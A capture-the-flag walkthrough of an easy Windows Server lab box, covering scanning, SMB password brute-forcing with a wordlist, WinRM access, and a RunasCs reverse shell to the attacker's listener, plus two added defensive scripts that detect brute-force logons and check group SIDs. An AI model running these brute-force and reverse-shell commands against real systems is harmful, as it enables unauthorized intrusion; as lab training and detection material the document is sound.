Difficulty: easy

Kali: 192.168.56.104

Target: 192.168.56.196

> arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:b4:46:04       PCS Systemtechnik GmbH
192.168.56.196  08:00:27:23:b8:a2       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.957 seconds (130.81 hosts/sec). 3 responded

Port scan

> nmap -sV -A 192.168.56.196 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-14 21:27 CST
Nmap scan report for 192.168.56.196
Host is up (0.00036s latency).
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:23:B8:A2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 2019
OS details: Microsoft Windows Server 2019
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-14T19:39:38
|_  start_date: N/A
|_nbstat: NetBIOS name: WIN-IURF14RBVGV, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:23:b8:a2 (Oracle VirtualBox virtual NIC)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 5h59m55s

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 192.168.56.196

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 747.61 seconds

SMB and MSRPC services are open; let's look at the HTTP service on port 80 first.

Directory scan

> gobuster dir -u http://192.168.56.196/ -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.196/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,bak,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 345413 / 1323366 (26.10%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 347732 / 1323366 (26.28%)
===============================================================
Finished
===============================================================

The web service probably has nothing of interest, but it does give away a username: nica.

SMB enumeration

First, check whether there are any shares.

> smbclient -L \\192.168.56.196      
Password for [WORKGROUP\root]:
session setup failed: NT_STATUS_ACCESS_DENIED

Try logging in without a password.

> smbclient -L 192.168.56.196 -U nica
Password for [WORKGROUP\nica]:
session setup failed: NT_STATUS_LOGON_FAILURE

Try brute-forcing with the username nica.

> hydra -l nica -P /usr/share/wordlists/rockyou.txt 192.168.56.196 smb -t 1
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-14 21:45:27
[DATA] max 1 task per 1 server, overall 1 task, 14344400 login tries (l:1/p:14344400), ~14344400 tries per task
[DATA] attacking smb://192.168.56.196:445/
[ERROR] invalid reply from target smb://192.168.56.196:445/

Switch to another tool, crackmapexec.

> crackmapexec smb 192.168.56.196 -u nica -p /usr/share/wordlists/rockyou.txt
SMB         192.168.56.196  445    WIN-IURF14RBVGV  [*] Windows 10.0 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)
SMB         192.168.56.196  445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\nica:123456 STATUS_LOGON_FAILURE 
SMB         192.168.56.196  445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\nica:12345 STATUS_LOGON_FAILURE 
SMB         192.168.56.196  445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\nica:123456789 STATUS_LOGON_FAILURE 
SMB         192.168.56.196  445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\nica:password STATUS_LOGON_FAILURE 
SMB         192.168.56.196  445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\nica:iloveyou STATUS_LOGON_FAILURE 
...
...
SMB         192.168.56.196  445    WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\nica:hardcore 

Got the password: hardcore

Look at the shares.

> smbclient -L //192.168.56.196 -U nica --option='client min protocol=SMB2'

Password for [WORKGROUP\nica]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Admin remota
        C$              Disk      Recurso predeterminado
        IPC$            IPC       IPC remota
SMB1 disabled -- no workgroup available
> smbclient.py nica:hardcore@192.168.56.196
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Type help for list of commands
# shares
ADMIN$
C$
IPC$
# use ADMIN$
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# use C$
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# use IPC$
# ls 
-rw-rw-rw-          3  Mon Jan  1 08:05:43 1601 InitShutdown
-rw-rw-rw-          4  Mon Jan  1 08:05:43 1601 lsass
-rw-rw-rw-          3  Mon Jan  1 08:05:43 1601 ntsvcs
-rw-rw-rw-          3  Mon Jan  1 08:05:43 1601 scerpc
-rw-rw-rw-          1  Mon Jan  1 08:05:43 1601 Winsock2\CatalogChangeListener-2ec-0
-rw-rw-rw-          3  Mon Jan  1 08:05:43 1601 epmapper
-rw-rw-rw-          1  Mon Jan  1 08:05:43 1601 Winsock2\CatalogChangeListener-1ac-0
-rw-rw-rw-          3  Mon Jan  1 08:05:43 1601 LSM_API_service
-rw-rw-rw-          3  Mon Jan  1 08:05:43 1601 eventlog
-rw-rw-rw-          1  Mon Jan  1 08:05:43 1601 Winsock2\CatalogChangeListener-36c-0
-rw-rw-rw-          3  Mon Jan  1 08:05:43 1601 atsvc
-rw-rw-rw-          4  Mon Jan  1 08:05:43 1601 wkssvc
-rw-rw-rw-          1  Mon Jan  1 08:05:43 1601 Winsock2\CatalogChangeListener-390-0
-rw-rw-rw-          3  Mon Jan  1 08:05:43 1601 W32TIME_ALT
-rw-rw-rw-          4  Mon Jan  1 08:05:43 1601 srvsvc
-rw-rw-rw-          1  Mon Jan  1 08:05:43 1601 Winsock2\CatalogChangeListener-21c-0
-rw-rw-rw-          1  Mon Jan  1 08:05:43 1601 Winsock2\CatalogChangeListener-3e8-0
-rw-rw-rw-          1  Mon Jan  1 08:05:43 1601 Winsock2\CatalogChangeListener-224-0
-rw-rw-rw-          1  Mon Jan  1 08:05:43 1601 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER

But there is nothing of interest there.
Since port 5985 is open, try connecting with evil-winrm.

> evil-winrm -i 192.168.56.196 -u nica -p hardcore    
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nica\Documents> dir
*Evil-WinRM* PS C:\Users\nica\Documents> cd ..
*Evil-WinRM* PS C:\Users\nica> dir


    Directorio: C:\Users\nica


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/15/2018   9:12 AM                Desktop
d-r---        9/26/2023   6:44 PM                Documents
d-r---        9/15/2018   9:12 AM                Downloads
d-r---        9/15/2018   9:12 AM                Favorites
d-r---        9/15/2018   9:12 AM                Links
d-r---        9/15/2018   9:12 AM                Music
d-r---        9/15/2018   9:12 AM                Pictures
d-----        9/15/2018   9:12 AM                Saved Games
d-r---        9/15/2018   9:12 AM                Videos
-a----        9/26/2023   6:44 PM             10 user.txt


*Evil-WinRM* PS C:\Users\nica> type user.txt
HMVWI****

Privilege escalation to administrator

Got the user flag; looking around the system turned up no important files.

*Evil-WinRM* PS C:\Users\nica> net user

Cuentas de usuario de \\

-------------------------------------------------------------------------------
Administrador            akanksha                 DefaultAccount
Invitado                 nica                     WDAGUtilityAccount
El comando se ha completado con uno o más errores.

Checking the user list shows that the administrator account is akanksha.
Continue with password brute-forcing.

> crackmapexec smb 192.168.56.196 -u Akanksha -p /usr/share/wordlists/rockyou.txt
SMB         192.168.56.196  445    WIN-IURF14RBVGV  [*] Windows 10.0 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)
SMB         192.168.56.196  445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\Akanksha:123456 STATUS_LOGON_FAILURE 
SMB         192.168.56.196  445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\Akanksha:12345 STATUS_LOGON_FAILURE 
...
...
SMB         192.168.56.196  445    WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\Akanksha:sweetgirl 

Got the password sweetgirl, but WinRM won't connect this time; maybe the account lacks the required privileges.
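On the defender's side, both wordlist runs above (against nica and against akanksha) leave a very distinctive trail: with logon auditing enabled, every rejected SMB authentication is a Security event 4625 with logon type 3 (network logon) and Status 0xC000006D (STATUS_LOGON_FAILURE, the same code crackmapexec prints), and the eventual hit is a 4624 from the same source. The script below is an added example, not part of the writeup or of any of the tools used in it. It parses a constructed export of such events (the one-line key=value format is an assumption for this example, not a Windows export format; the sample events are made up, not captured from the box) and raises an alert when one source exceeds a failure threshold inside a time window, and a second, higher-priority alert when a success follows such a burst.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample, not captured from the target: Security events 4625 (failed
# logon) and 4624 (successful logon), one per line as key=value pairs (the export
# format is an assumption for this example). LogonType=3 is a network logon, which
# is what each SMB authentication attempt on port 445 produces. Status 0xC000006D
# is STATUS_LOGON_FAILURE; the SubStatus says why the logon was rejected.
SAMPLE_EVENTS = """\
2024-07-14T21:46:01 EventID=4625 LogonType=3 TargetUserName=nica IpAddress=192.168.56.104 Status=0xC000006D SubStatus=0xC000006A
2024-07-14T21:46:01 EventID=4625 LogonType=3 TargetUserName=nica IpAddress=192.168.56.104 Status=0xC000006D SubStatus=0xC000006A
2024-07-14T21:46:02 EventID=4625 LogonType=3 TargetUserName=nica IpAddress=192.168.56.104 Status=0xC000006D SubStatus=0xC000006A
2024-07-14T21:46:02 EventID=4625 LogonType=3 TargetUserName=nica IpAddress=192.168.56.104 Status=0xC000006D SubStatus=0xC000006A
2024-07-14T21:46:03 EventID=4625 LogonType=3 TargetUserName=nica IpAddress=192.168.56.104 Status=0xC000006D SubStatus=0xC000006A
2024-07-14T21:46:03 EventID=4625 LogonType=3 TargetUserName=nica IpAddress=192.168.56.104 Status=0xC000006D SubStatus=0xC000006A
2024-07-14T21:46:04 EventID=4624 LogonType=3 TargetUserName=nica IpAddress=192.168.56.104
2024-07-14T21:50:00 EventID=4625 LogonType=3 TargetUserName=bob IpAddress=192.168.56.1 Status=0xC000006D SubStatus=0xC0000064
"""

# 4625 SubStatus values and what they tell the analyst.
SUBSTATUS_MEANING = {
    "0xC000006A": "bad password for a valid account",
    "0xC0000064": "account does not exist",
    "0xC0000234": "account locked out",
}


def parse_events(text):
    """Turn the key=value lines into dicts with a parsed 'ts' timestamp."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, *pairs = line.split()
        ev = {"ts": datetime.fromisoformat(ts)}
        for pair in pairs:
            key, _, value = pair.partition("=")
            ev[key] = value
        events.append(ev)
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Alert on (source IP, account) pairs with >= `threshold` failed network
    logons inside `window`, and on a success that follows such a burst, which
    is exactly the pattern a wordlist run that finally hits produces."""
    failures = defaultdict(deque)   # (ip, user) -> timestamps of recent 4625s
    bursting = set()                # keys currently above the threshold
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev.get("LogonType") != "3":
            continue                # only network logons (SMB, WinRM, ...)
        key = (ev["IpAddress"], ev["TargetUserName"].lower())
        if ev["EventID"] == "4625":
            q = failures[key]
            q.append(ev["ts"])
            while q and ev["ts"] - q[0] > window:
                q.popleft()         # drop failures that fell out of the window
            if len(q) >= threshold and key not in bursting:
                bursting.add(key)
                alerts.append({"type": "bruteforce", "ip": key[0], "user": key[1],
                               "failures": len(q),
                               "reason": SUBSTATUS_MEANING.get(ev.get("SubStatus"), "unknown")})
        elif ev["EventID"] == "4624" and key in bursting:
            alerts.append({"type": "success_after_bruteforce", "ip": key[0], "user": key[1]})
            bursting.discard(key)
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The threshold and window are deliberately low here so the constructed sample trips them; on a real host, rockyou.txt at the rate shown in the writeup produces thousands of 4625 events per minute from one address, so the first alert fires long before the password is found, and the "success after burst" alert is the one worth paging on.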

> evil-winrm -i 192.168.56.196 -u akanksha -p sweetgirl

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
                                        
Error: Exiting with code 1

Use the tool https://github.com/antonioCoco/RunasCs to execute a command with a specified user's privileges.

*Evil-WinRM* PS C:\Users\nica> upload RunasCs.exe
                                        
Info: Uploading /root/Desktop/RunasCs.exe to C:\Users\nica\RunasCs.exe
                                        
Error: Upload failed. Check filenames or paths: No such file or directory - No such file or directory /root/Desktop/RunasCs.exe
*Evil-WinRM* PS C:\Users\nica> upload RunasCs.exe
                                        
Info: Uploading /root/Desktop/RunasCs.exe to C:\Users\nica\RunasCs.exe
                                        
Data: 68948 bytes of 68948 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\nica> dir


    Directorio: C:\Users\nica


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/15/2018   9:12 AM                Desktop
d-r---        9/26/2023   6:44 PM                Documents
d-r---        9/15/2018   9:12 AM                Downloads
d-r---        9/15/2018   9:12 AM                Favorites
d-r---        9/15/2018   9:12 AM                Links
d-r---        9/15/2018   9:12 AM                Music
d-r---        9/15/2018   9:12 AM                Pictures
d-----        9/15/2018   9:12 AM                Saved Games
d-r---        9/15/2018   9:12 AM                Videos
-a----        7/14/2024  10:49 PM          51712 RunasCs.exe
-a----        9/26/2023   6:44 PM             10 user.txt


*Evil-WinRM* PS C:\Users\nica> ./RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.56.104:4567

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-2922e6$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 2496 created in background.
> nc -lvnp 4567                                                        
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.196] 49674
Microsoft Windows [Versión 10.0.17763.107]
(c) 2018 Microsoft Corporation. Todos los derechos reservados.

C:\Windows\system32>

A shell was successfully returned.

C:\Users>whoami /groups
whoami /groups

INFORMACIÓN DE GRUPO
--------------------

Nombre de grupo                              Tipo           SID                                            Atributos                                                               
============================================ ============== ============================================== ========================================================================
Todos                                        Grupo conocido S-1-1-0                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
WIN-IURF14RBVGV\Idministritirs               Alias          S-1-5-21-2519875556-2276787807-2868128514-1002 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios                             Alias          S-1-5-32-545                                   Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\INTERACTIVE                     Grupo conocido S-1-5-4                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
INICIO DE SESIÓN EN LA CONSOLA               Grupo conocido S-1-2-1                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Usuarios autentificados         Grupo conocido S-1-5-11                                       Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Esta compañía                   Grupo conocido S-1-5-15                                       Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Cuenta local                    Grupo conocido S-1-5-113                                      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Autenticación NTLM              Grupo conocido S-1-5-64-10                                    Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
Etiqueta obligatoria\Nivel obligatorio medio Etiqueta       S-1-16-8192        

The group is Idministritirs, which is Administrator.
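Group names in `whoami /groups` are localized (this box prints Spanish names) and a local group can be created with any name, so the SID column is the only reliable way to tell what a group really is. The built-in Administrators alias always has the fixed SID S-1-5-32-544, a SID of the form S-1-5-21-&lt;machine&gt;-1002 is a user-created local group (RIDs from 1000 up are allocated to new accounts and groups), and the label S-1-16-8192 is the Medium integrity level, whereas an elevated administrator token carries S-1-16-12288 (High). The helper below is an added example, not part of the writeup: it parses the fixed-width table above (copied from the shell output and trimmed to its first three columns) using the `====` ruler for column widths, resolves each SID, and reports whether the token is actually an elevated member of the built-in Administrators group. The SID tables are the standard well-known values; anything not in them is reported as unresolved rather than guessed.

```python
import re

# The `whoami /groups` table from the shell above (Spanish-localized Windows), copied
# from the writeup and trimmed to its first three columns. whoami prints a fixed-width
# table on every locale, so column widths are read from the '====' ruler line.
WHOAMI_GROUPS = r"""
Nombre de grupo                              Tipo           SID
============================================ ============== ==============================================
Todos                                        Grupo conocido S-1-1-0
WIN-IURF14RBVGV\Idministritirs               Alias          S-1-5-21-2519875556-2276787807-2868128514-1002
BUILTIN\Usuarios                             Alias          S-1-5-32-545
NT AUTHORITY\INTERACTIVE                     Grupo conocido S-1-5-4
INICIO DE SESIÓN EN LA CONSOLA               Grupo conocido S-1-2-1
NT AUTHORITY\Usuarios autentificados         Grupo conocido S-1-5-11
NT AUTHORITY\Esta compañía                   Grupo conocido S-1-5-15
NT AUTHORITY\Cuenta local                    Grupo conocido S-1-5-113
NT AUTHORITY\Autenticación NTLM              Grupo conocido S-1-5-64-10
Etiqueta obligatoria\Nivel obligatorio medio Etiqueta       S-1-16-8192
"""

SID_RE = re.compile(r"S-1-\d+(?:-\d+)+")

# Fixed SIDs that mean the same thing on every Windows install, whatever the locale calls them.
WELL_KNOWN = {
    "S-1-1-0": "Everyone",
    "S-1-2-1": "Console Logon",
    "S-1-5-4": "NT AUTHORITY\\INTERACTIVE",
    "S-1-5-11": "NT AUTHORITY\\Authenticated Users",
    "S-1-5-15": "NT AUTHORITY\\This Organization",
    "S-1-5-113": "NT AUTHORITY\\Local account",
    "S-1-5-64-10": "NT AUTHORITY\\NTLM Authentication",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-32-580": "BUILTIN\\Remote Management Users",
}
# Mandatory integrity labels (S-1-16-<level>).
INTEGRITY = {"S-1-16-4096": "Low", "S-1-16-8192": "Medium",
             "S-1-16-12288": "High", "S-1-16-16384": "System"}
# Well-known relative IDs under a machine or domain SID (S-1-5-21-...); RIDs >= 1000 are user-created.
KNOWN_RIDS = {500: "built-in Administrator account", 501: "built-in Guest account",
              512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins"}


def parse_whoami_groups(text):
    """Parse the fixed-width table; column bounds come from the '====' ruler, so
    the parser does not depend on header words, spaces or backslashes in names."""
    lines = [l for l in text.splitlines() if l.strip()]
    ruler = next(i for i, l in enumerate(lines) if l.startswith("="))
    bounds = [(m.start(), m.end()) for m in re.finditer(r"=+", lines[ruler])]
    rows = []
    for line in lines[ruler + 1:]:
        sid = SID_RE.search(line)
        if not sid:
            continue
        rows.append({"name": line[bounds[0][0]:bounds[0][1]].strip(),
                     "type": line[bounds[1][0]:bounds[1][1]].strip(),
                     "sid": sid.group(0)})
    return rows


def classify_sid(sid):
    """Map a SID to what it really is, independent of its display name."""
    if sid in INTEGRITY:
        return ("integrity", INTEGRITY[sid])
    if sid in WELL_KNOWN:
        return ("well-known", WELL_KNOWN[sid])
    if sid.startswith("S-1-5-21-"):
        rid = int(sid.rsplit("-", 1)[1])
        return ("machine/domain", KNOWN_RIDS.get(rid, f"user-created principal (RID {rid})"))
    return ("unknown", sid)


def analyze_token(text):
    """Summarize a token: is it really in BUILTIN\\Administrators, at what integrity
    level, and which groups are user-created (and so could carry any name)."""
    report = {"builtin_administrators": False, "integrity": None, "custom": [], "groups": []}
    for row in parse_whoami_groups(text):
        kind, meaning = classify_sid(row["sid"])
        report["groups"].append((row["name"], row["sid"], meaning))
        if kind == "integrity":
            report["integrity"] = meaning
        elif row["sid"] == "S-1-5-32-544":
            report["builtin_administrators"] = True
        elif kind == "machine/domain" and meaning.startswith("user-created"):
            report["custom"].append((row["name"], row["sid"]))
    # An elevated admin token carries S-1-5-32-544 *and* the High integrity label.
    report["elevated_admin"] = report["builtin_administrators"] and report["integrity"] == "High"
    return report


if __name__ == "__main__":
    for name, sid, meaning in analyze_token(WHOAMI_GROUPS)["groups"]:
        print(f"{name:45} {sid:46} {meaning}")
```

Run against the table from this shell, the helper finds no S-1-5-32-544 entry, one user-created group (the alias with RID 1002) and a Medium integrity label, which is the kind of check to run before trusting a group name that merely looks like "Administrators".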

C:\Users\Administrador>dir
dir
 El volumen de la unidad C no tiene etiqueta.
 El número de serie del volumen es: 26CD-AE41

 Directorio de C:\Users\Administrador

26/09/2023  18:36    <DIR>          .
26/09/2023  18:36    <DIR>          ..
26/09/2023  15:11    <DIR>          3D Objects
26/09/2023  15:11    <DIR>          Contacts
26/09/2023  15:11    <DIR>          Desktop
26/09/2023  15:11    <DIR>          Documents
26/09/2023  15:11    <DIR>          Downloads
26/09/2023  15:11    <DIR>          Favorites
26/09/2023  15:11    <DIR>          Links
26/09/2023  15:11    <DIR>          Music
26/09/2023  15:24            16.418 new.cfg
26/09/2023  15:11    <DIR>          Pictures
26/09/2023  18:36                13 root.txt
26/09/2023  15:11    <DIR>          Saved Games
26/09/2023  15:11    <DIR>          Searches
26/09/2023  15:11    <DIR>          Videos
               2 archivos         16.431 bytes
              14 dirs  45.911.502.848 bytes libres

C:\Users\Administrador>type root.txt
type root.txt
HMV1******